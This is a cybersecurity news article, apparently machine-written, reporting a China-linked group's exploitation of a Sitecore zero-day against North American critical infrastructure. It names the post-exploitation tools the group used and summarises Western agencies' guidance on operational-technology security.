Ethical Hacking News
Threat actors aligned with China have been exploiting a Sitecore zero-day vulnerability in attacks on American critical infrastructure, highlighting concerns about Chinese threat actors targeting critical infrastructure sectors. Cisco Talos has attributed the attack to UAT-8837, a threat actor that is likely aligned with China based on tactical overlaps with other campaigns.
Threat actors from China target critical infrastructure sectors in North America using a zero-day vulnerability in Sitecore. The attack, attributed to UAT-8837, uses advanced persistent threat tactics and techniques to obtain initial access to high-value organizations. UAT-8837 primarily deploys open-source tools to harvest sensitive information such as credentials and security configurations. The vulnerability exploited in Sitecore has a CVSS score of 9.0, allowing attackers to execute arbitrary code on vulnerable servers. Cisco Talos assesses UAT-8837 as a China-nexus APT actor with medium confidence based on tactical overlaps with other campaigns. Western governments issue warnings about threats to operational technology (OT) environments, urging organizations to take proactive security measures.
Threat actors from China have been observed targeting critical infrastructure sectors in North America, leveraging a newly discovered zero-day vulnerability in the web content management platform Sitecore. The attack, attributed to a threat actor aligned with China, utilizes advanced persistent threat (APT) tactics and techniques to obtain initial access to high-value organizations.
According to Cisco Talos, the threat actor, identified as UAT-8837, is primarily tasked with obtaining initial access to critical infrastructure sectors in North America. After gaining access, UAT-8837 predominantly deploys open-source tools to harvest sensitive information such as credentials, security configurations, and domain and Active Directory (AD) information. The threat actor creates multiple channels of access to its victims by using the obtained information.
The attack vector employed by UAT-8837 involves exploiting a critical zero-day vulnerability in Sitecore, specifically CVE-2025-53690 with a CVSS score of 9.0. The vulnerability allows attackers to execute arbitrary code on vulnerable servers, providing an entry point for further exploitation. The intrusion observed by Cisco Talos shares TTPs, tooling, and infrastructure similarities with a campaign detailed by Google-owned Mandiant in September 2025.
UAT-8837 is also noted to have employed several artifacts to enable post-exploitation. These include GoTokenTheft, an exploit designed to steal access tokens; EarthWorm, which creates a reverse tunnel to attacker-controlled servers using SOCKS; DWAgent, which enables persistent remote access and AD reconnaissance; SharpHound, used for Active Directory information collection; Impacket, allowing commands with elevated privileges; GoExec, a Golang-based tool to execute commands on other connected remote endpoints within the victim's network; Rubeus, a C# based toolset for Kerberos interaction and abuse; and Certipy, which facilitates Active Directory discovery and abuse.
Researchers from Cisco Talos have assessed UAT-8837 as a China-nexus APT actor with medium confidence based on tactical overlaps with other campaigns mounted by threat actors from the region. The attack highlights concerns about Chinese threat actors targeting critical infrastructure in North America and the need for organizations to take proactive measures to secure their networks.
In recent years, Western governments have issued several alerts regarding threats to operational technology (OT) environments. This week, cybersecurity and intelligence agencies from Australia, Germany, the Netherlands, New Zealand, the U.K., and the U.S. warned about growing threats to OT environments, urging organizations to limit exposure, centralize and standardize network connections, use secure protocols, harden OT boundaries, ensure all connectivity is monitored and logged, and avoid using obsolete assets that could heighten security risks.
The guidance comes as threats to operational technology continue to rise, with state-sponsored actors actively targeting critical national infrastructure (CNI) networks. The threat is not limited to state-sponsored actors, with opportunistic attackers also exploiting insecure OT infrastructure.
In light of these developments, cybersecurity and risk management professionals must prioritize the implementation of robust security measures to protect their organizations' critical infrastructure from such threats.
Related Information:
https://www.ethicalhackingnews.com/articles/A-New-Era-of-Cyber-Warfare-China-Linked-APT-Exploits-Sitecore-Zero-Day-in-Attacks-on-American-Critical-Infrastructure-ehn.shtml
https://thehackernews.com/2026/01/china-linked-apt-exploits-sitecore-zero.html
https://nvd.nist.gov/vuln/detail/CVE-2025-53690
https://www.cvedetails.com/cve/CVE-2025-53690/
Published: Fri Jan 16 02:59:11 2026 by llama3.2 3B Q4_K_M
